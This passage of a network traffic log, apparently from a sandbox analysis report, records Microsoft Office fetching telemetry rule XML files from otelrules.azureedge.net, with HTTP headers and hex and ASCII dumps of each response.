                  2024-10-23 04:48:16 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                  Session IDSource IPSource PortDestination IPDestination Port
                  87192.168.2.44983513.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:16 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:16 UTC584INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:16 GMT
                  Content-Type: text/xml
                  Content-Length: 2592
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                  ETag: "0x8DC582BB5B890DB"
                  x-ms-request-id: 0eea03f1-d01e-0066-098a-21ea17000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044816Z-16849878b785f8wh85a0w3ennn00000005n000000000gd1t
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:16 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                  Session IDSource IPSource PortDestination IPDestination Port
                  88192.168.2.44983613.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:16 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:17 UTC584INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:16 GMT
                  Content-Type: text/xml
                  Content-Length: 3342
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                  ETag: "0x8DC582B927E47E9"
                  x-ms-request-id: d9905de8-801e-0083-31a7-24f0ae000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044816Z-15b8d89586f6nn8zquf2vw6t5400000002z0000000000wtp
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:17 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                  Session IDSource IPSource PortDestination IPDestination Port
                  89192.168.2.44983813.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:17 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:17 UTC563INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:17 GMT
                  Content-Type: text/xml
                  Content-Length: 2284
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                  ETag: "0x8DC582BCD58BEEE"
                  x-ms-request-id: 273a8d1a-001e-0034-0d8c-21dd04000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044817Z-16849878b78dkr6tqerbnpg1zc00000005r000000000c397
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:17 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                  Session IDSource IPSource PortDestination IPDestination Port
                  90192.168.2.44983713.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:17 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:17 UTC563INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:17 GMT
                  Content-Type: text/xml
                  Content-Length: 1393
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                  ETag: "0x8DC582BE3E55B6E"
                  x-ms-request-id: d0d0f8e5-601e-000d-298c-212618000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044817Z-16849878b78fmrkt2ukpvh9wh400000005n000000000fq2d
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:17 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                  Session IDSource IPSource PortDestination IPDestination Port
                  91192.168.2.44983913.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:17 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:17 UTC584INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:17 GMT
                  Content-Type: text/xml
                  Content-Length: 1356
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                  ETag: "0x8DC582BDC681E17"
                  x-ms-request-id: 9f3a3312-201e-0096-7bbe-20ace6000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044817Z-16849878b78ngdnlw4w0762cms00000005r000000000mkqg
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:17 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                  Session IDSource IPSource PortDestination IPDestination Port
                  92192.168.2.44984013.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:17 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:17 UTC563INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:17 GMT
                  Content-Type: text/xml
                  Content-Length: 1393
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                  ETag: "0x8DC582BE39DFC9B"
                  x-ms-request-id: ef146494-c01e-00a1-274d-227e4a000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044817Z-16849878b78c5zx4gw8tcga1b400000005ng000000006vv9
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:17 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                  Session IDSource IPSource PortDestination IPDestination Port
                  93192.168.2.44984113.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:18 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:18 UTC563INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:18 GMT
                  Content-Type: text/xml
                  Content-Length: 1356
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                  ETag: "0x8DC582BDF66E42D"
                  x-ms-request-id: 99f767df-201e-0085-6517-2434e3000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044818Z-15b8d89586fdmfsg1u7xrpfws0000000018000000000dexf
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:18 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                  Session IDSource IPSource PortDestination IPDestination Port
                  94192.168.2.44984213.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:18 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:18 UTC563INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:18 GMT
                  Content-Type: text/xml
                  Content-Length: 1395
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                  ETag: "0x8DC582BE017CAD3"
                  x-ms-request-id: 81a30cc9-b01e-0070-7616-241cc0000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044818Z-r197bdfb6b4rkc6mucm45nkzmn00000003ug00000000gu0n
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:18 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                  Session IDSource IPSource PortDestination IPDestination Port
                  95192.168.2.44984313.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:18 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:18 UTC584INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:18 GMT
                  Content-Type: text/xml
                  Content-Length: 1358
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                  ETag: "0x8DC582BE6431446"
                  x-ms-request-id: 20049dc1-d01e-0014-1b33-22ed58000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044818Z-16849878b7862vlcc7m66axrs000000005tg000000004k57
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:18 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                  Session IDSource IPSource PortDestination IPDestination Port
                  96192.168.2.44984413.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:18 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:18 UTC563INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:18 GMT
                  Content-Type: text/xml
                  Content-Length: 1395
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                  ETag: "0x8DC582BDE12A98D"
                  x-ms-request-id: 14811fc9-901e-0016-298e-21efe9000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044818Z-16849878b787psctgubawhx7k800000005f000000000ksrw
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:18 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                  Session IDSource IPSource PortDestination IPDestination Port
                  97192.168.2.44984513.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:18 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:18 UTC563INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:18 GMT
                  Content-Type: text/xml
                  Content-Length: 1358
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                  ETag: "0x8DC582BE022ECC5"
                  x-ms-request-id: e49e03d9-e01e-0099-3a1c-24da8a000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044818Z-r197bdfb6b46gt25anfa5gg2fw000000013g00000000pe21
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
